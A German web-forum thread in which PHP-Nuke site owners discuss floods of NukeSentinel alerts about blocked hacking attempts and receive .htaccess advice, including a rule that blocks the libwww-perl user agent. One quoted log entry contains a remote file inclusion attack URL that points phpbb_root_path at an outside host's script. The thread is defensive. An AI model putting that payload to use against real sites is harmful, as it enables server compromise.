| Vorheriges Thema anzeigen :: Nächstes Thema anzeigen |
| Autor |
Nachricht |
Locke
Newbie
Anmeldungsdatum: Nov 24, 2005
Beiträge: 72
|
 Verfasst am: Di Jun 26, 2007 3:52 pm Titel: Massig Mail das nervt. |
 |
|
Ich habe in Kürzester Zeit an die 134 Hackversuche dank Sentinel abweheren können.
Und die Zeitabstände der Angrife werden immer kürzer.
Hab hier mal die letzten 2 von den über 100 gepostet.
Da kriege ich solche Sachen wie z.b. sowas hier ständig als Mail:
Datum & Uhrzeit: 2007-06-26 15:26:32 CEST GMT +0200
Gesperrte IP: 71.39.13.57
Benutzer-ID: Gast (1)
Grund: Abuse-Filter
--------------------
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/103u (KHTML, like Gecko) Safari/100
Query-String: Hinweis: Nur registrierte Benutzer haben die Möglichkeit in diesem Forum "Links" zu sehen!
Bitte Registrieren oder Einloggen - Danke! |
Get String: Hinweis: Nur registrierte Benutzer haben die Möglichkeit in diesem Forum "Links" zu sehen!
Bitte Registrieren oder Einloggen - Danke! |
Post String: Hinweis: Nur registrierte Benutzer haben die Möglichkeit in diesem Forum "Links" zu sehen!
Bitte Registrieren oder Einloggen - Danke! |
Weitergeleitet für: none
Client-IP: none
Entfernte Adresse: 71.39.13.57
Entfernter Port: 33126
Anfrage-Methode: GET
oder
Datum & Uhrzeit: 2007-06-26 15:13:54 CEST GMT +0200
Gesperrte IP: 72.232.160.213
Benutzer-ID: Gast (1)
Grund: Abuse-Filter
--------------------
User-Agent: libwww-perl/5.805
Query-String: Hinweis: Nur registrierte Benutzer haben die Möglichkeit in diesem Forum "Links" zu sehen!
Bitte Registrieren oder Einloggen - Danke! |
Get String: Hinweis: Nur registrierte Benutzer haben die Möglichkeit in diesem Forum "Links" zu sehen!
Bitte Registrieren oder Einloggen - Danke! |
Post String: Hinweis: Nur registrierte Benutzer haben die Möglichkeit in diesem Forum "Links" zu sehen!
Bitte Registrieren oder Einloggen - Danke! |
Weitergeleitet für: none
Client-IP: none
Entfernte Adresse: 72.232.160.213
Entfernter Port: 39668
Anfrage-Methode: GET
Auf dauer nerven die e-mails ich habe schon wieder 15 solcher Mails.
Was muss ich einstellen das diese Ar***geigen zwar gesperrt werden ich jedoch nur über das wirklich wichtige informiert werde z.b. wenn die Versuchen sich über admin einzuloggen.
Davon mal abgesehen viel Grips müssen diese Kinder nicht haben.
Nachdem durch eine veraltete Word-Press Version der komplette Webserver gehackt wurde bin ich auf Nuke 7.6 von Nukecops umgestiegen und solche Sachen wie 4nalbum und Squery benutze ich schon gar nicht mehr. Jedoch probieren die das über diese Module immer wieder.  |
|
| Nach oben |
|
 |
Coldcut
Site Admin
Anmeldungsdatum: Jun 16, 2005
Beiträge: 875
Wohnort: Austria
|
| Verfasst am: Di Jun 26, 2007 5:23 pm Titel: |
|
|
Hi!
Die Kiddies nehmen vorgefertigte Scripte in denen sich diese Urls befnden.
Ob diese Links nun existieren oder nicht kontrollieren sie erst gar nicht.
Man sieht ja ausserdem das sie die Links nicht mal richtig kopieren können. *gg*
Die versuchen das auf gut Glück auf jeder PHP-Nuke Seite aus.
Der Angriff auf den Forum Admin Bereich wurde schon im Patch 2.9 gefixt, bzw. im phpBB 2.0.18 (oder füher).
Abhilfe gegen diese läßtigen Mails hilft einfach ein Passwortschutz für den Forum Admin Ordner.
Das mit dem 4nAlbum bin ich leider überfragt.
Hatte zwar selbst mal solche Mails, aber das hat sich 2 - 3 Wochen später von selbst erledigt.
Seit den Kiddies von den Eltern das Komasaufen verboten wurde, lassen die den Frust wieder im Internet aus. 
Mir kommt nämlich vor, seit dieses Thema in den Medien present ist, ist wieder ein Anstieg der Angriffe zu verzeichnen.
Oder es ist wieder eine neue Generation unterwegs.
Coldcut 
_________________
CiroxX©™ Development Team
----------
"Dann klappts auch mit der Nachbarin!"
- - - - - - - - - - -
-> Hinweis: Nur registrierte Benutzer haben die Möglichkeit in diesem Forum "Links" zu sehen!
Bitte Registrieren oder Einloggen - Danke! |
<- |
|
| Nach oben |
|
|
Locke
Newbie
Anmeldungsdatum: Nov 24, 2005
Beiträge: 72
|
| Verfasst am: Di Jun 26, 2007 6:06 pm Titel: |
|
|
Den Forum Adminbereich konnt ich dank deiner Hilfe ja mit einer htaccess nochemal sichern.
Was kann ich gegen diese Mails machen?
Ich möchte schon das solche Leute gesperrt werden nur möchte ich nicht ständig mein Postfach voll haben.  |
|
| Nach oben |
|
|
Coldcut
Site Admin
Anmeldungsdatum: Jun 16, 2005
Beiträge: 875
Wohnort: Austria
|
| Verfasst am: Mi Jun 27, 2007 10:25 am Titel: |
|
|
Ob man diese Urlanfragen mittels .htaccess sperren kann weiß ich leider nicht.
Ansonsten wäre das noch eine Möglichkeit.
Coldcut
_________________
CiroxX©™ Development Team
----------
"Dann klappts auch mit der Nachbarin!"
- - - - - - - - - - -
-> Hinweis: Nur registrierte Benutzer haben die Möglichkeit in diesem Forum "Links" zu sehen!
Bitte Registrieren oder Einloggen - Danke! |
<- |
|
| Nach oben |
|
|
Locke
Newbie
Anmeldungsdatum: Nov 24, 2005
Beiträge: 72
|
| Verfasst am: Mi Jun 27, 2007 10:13 pm Titel: |
|
|
Na mir gehts ja nur um die Benachrichtigungen von Sentinel, die würde ich gerne abschalten und die Hacker dennoch sperren.
Achso mittlerweile haben es heute wieder 50 geschafft mich zu besuchen. |
|
| Nach oben |
|
|
Coldcut
Site Admin
Anmeldungsdatum: Jun 16, 2005
Beiträge: 875
Wohnort: Austria
|
| Verfasst am: Fr Jun 29, 2007 9:06 am Titel: |
|
|
Naja, so gesehen ist es besser einmal zu oft gewarnt als einmal zu wenig. 
Vielleicht hat Susann noch eine Idee.
Coldcut
_________________
CiroxX©™ Development Team
----------
"Dann klappts auch mit der Nachbarin!"
- - - - - - - - - - -
-> Hinweis: Nur registrierte Benutzer haben die Möglichkeit in diesem Forum "Links" zu sehen!
Bitte Registrieren oder Einloggen - Danke! |
<- |
|
| Nach oben |
|
|
Susann
Moderator
Anmeldungsdatum: Jun 13, 2005
Beiträge: 444
Wohnort: Germany
|
| Verfasst am: Fr Jun 29, 2007 6:13 pm Titel: |
|
|
Sicher hab immer Ideen. Füg das in deine .htaccess ein:
| Zitat: |
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ Hinweis: Nur registrierte Benutzer haben die Möglichkeit in diesem Forum "Links" zu sehen!
Bitte Registrieren oder Einloggen - Danke! |
[R,L] |
Sollte über 90 Prozent solcher Zugriffe abwehren.
Außerdem kannst du dir noch weitere Regeln für böse Bots in der .htaccess zulegen, sodaß du für diese keine e-mails von NukeSentinel mehr bekommst. |
|
| Nach oben |
|
|
Locke
Newbie
Anmeldungsdatum: Nov 24, 2005
Beiträge: 72
|
| Verfasst am: So Jul 01, 2007 7:54 am Titel: |
|
|
Klasse Sache das. Es scheint zu funktionieren.
Danke schön.  |
|
| Nach oben |
|
|
Hacki
Newbie
Anmeldungsdatum: Oct 26, 2006
Beiträge: 20
Wohnort: Ebersdorf /Thüringen
|
| Verfasst am: Do Jul 05, 2007 8:27 pm Titel: Hack attacken |
|
|
scheinbar bin ich jetzt der an den sich die hacker aus lassen 
Susann + Coldcut hier eine der mails die ich erhallte und immer ist das Forum betroffen !
| Code: | Datum & Uhrzeit: 2007-07-05 18:03:07 CEST GMT +0200
Gesperrte IP: 62.168.116.*
Benutzer-ID: Anonymous (1)
Grund: Abuse-Filter
--------------------
User-Agent: libwww-perl/5.805
Query-String: ubuntuost.ub.ohost.de/modules.php?name=Forums&file=viewforum&f=4//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.csksib.ru/admin/newspublish/evilx?
Get String: ubuntuost.ub.ohost.de/modules.php?name=Forums&file=viewforum&f=4//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.csksib.ru/admin/newspublish/evilx?
Post String: ubuntuost.ub.ohost.de/modules.php
Weitergeleitet für: none
Client-IP: none
Entfernte Adresse: 62.168.116.116
Entfernter Port: 3707
Anfrage-Methode: GET
--------------------
Who-Is für IP
Unable to query WhoIs information for 62.168.116.116. |
Susann hatte eine lösung gepostet mit einer .htaccess
| Code: |
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ http://127.0.0.1 [R,L] |
und diesen inhallt , Wo in welchen ortner mus ich die .htaccess legen damit ich ruhe habe ?
Bitte um schnelle antwort da ich genau wie der tread ersteller mit mails bomadiert werde !
Vielen Dank
_________________
Mfg HAcki
Nur Freiwillige Besucher sind gute Besucher |
|
| Nach oben |
|
|
Susann
Moderator
Anmeldungsdatum: Jun 13, 2005
Beiträge: 444
Wohnort: Germany
|
| Verfasst am: Fr Jul 06, 2007 12:05 am Titel: |
|
|
Wenn du erklären kannst, warum dein RavenNuke copyright link nicht sichtbar ist, kann ich dir auch gerne sagen, wohin mit dem Code.
So long |
|
| Nach oben |
|
|
Hacki
Newbie
Anmeldungsdatum: Oct 26, 2006
Beiträge: 20
Wohnort: Ebersdorf /Thüringen
|
| Verfasst am: Fr Jul 06, 2007 9:24 am Titel: |
|
|
ok habe ich reingebaut 
war mir nicht bewust das dies wichtig ist susann bin noch anfänger als webmaster, und schaue da nicht auf solche wichtigen dinge .
sorry kommt nimmer vor ..
_________________
Mfg HAcki
Nur Freiwillige Besucher sind gute Besucher |
|
| Nach oben |
|
|
Susann
Moderator
Anmeldungsdatum: Jun 13, 2005
Beiträge: 444
Wohnort: Germany
|
| Verfasst am: Fr Jul 06, 2007 12:03 pm Titel: |
|
|
Pack den Code in die .htaccess, die sich im Root befindet, üblicherweise da, wo auch deine index.php und mainfile.php liegt.
Alle Themen aus dem RavenNuke Package enthalten im Footer:
Distributed by Raven PHP Scripts mit Link und auch wenn ein anders Theme verwendet wird, finde ich es nur fair darauf zu verweisen, um Support zu erhalten. So wirst du z.B. auch bei phpBB keinen Support erhalten, wenn kein entsprechender Link vorhanden ist.
P.S. Ich hoffe, mein RSSForum Bild gefällt dir.
So long
Susann
RavenNuke Development und Support Team |
|
| Nach oben |
|
|
Hacki
Newbie
Anmeldungsdatum: Oct 26, 2006
Beiträge: 20
Wohnort: Ebersdorf /Thüringen
|
| Verfasst am: Fr Jul 06, 2007 1:15 pm Titel: |
|
|
bist du auf irgenwas sauer susann ? sage mir was dir was nicht passt bitte ich mag es nicht wen man um den brei redet !
Also das mit der .htaccess funzt nicht , ich habe eine lere datei genommen mit Screem geöfnet und habe deinen code reinkopiert und als
.htacess abgespeichert und ins rootverzeichniss geschoben ,nun habe ich kein zugriff mer über http also auch für mich ist keine seite mer da .
Ich habe sie mal wider raus genommen bis ich eine antwort habe von dir .
_________________
Mfg HAcki
Nur Freiwillige Besucher sind gute Besucher |
|
| Nach oben |
|
|
Susann
Moderator
Anmeldungsdatum: Jun 13, 2005
Beiträge: 444
Wohnort: Germany
|
| Verfasst am: Fr Jul 06, 2007 2:53 pm Titel: |
|
|
Der Code wird in die vorhandene .htaccess eingefügt.
in dem RavenNuke Package sind sample.htaccess, sample staccess sample.ftaccess für NukeSentinel sowie ShortLinkshtaccess bereits enthalten.
Wenn du also eine vorhandenen .htaccess nutzt, dann wird es da eingefügt.
Es gibt im Root nur eine .htaccess. Kann Apache die Datei nicht interpretieren, weil sie Fehler enthält gibts einen Fehler 500 Internal Server Error.
Möglicherweise beeinhaltet dein Webspace auch keine eigene .htaccess. Keine Ahnung.
Sauer bin ich nicht, aber ich hab generell wenig Verständnis für Leute, die nur nehmen und nichts geben. Fass das auf, wie du willst. |
|
| Nach oben |
|
|
Hacki
Newbie
Anmeldungsdatum: Oct 26, 2006
Beiträge: 20
Wohnort: Ebersdorf /Thüringen
|
| Verfasst am: Fr Jul 06, 2007 3:17 pm Titel: |
|
|
also mus ich ich den code in die sample.htaccess eintargen wen ich dich richtig verstehe ?
| Zitat: | | aber ich hab generell wenig Verständnis für Leute, die nur nehmen und nichts geben |
gib mir ein banner von deiner seite ich verlinke dich
_________________
Mfg HAcki
Nur Freiwillige Besucher sind gute Besucher |
|
| Nach oben |
|
|
|
FAQ
Suchen
Benutzergruppen
Profil
Login
and 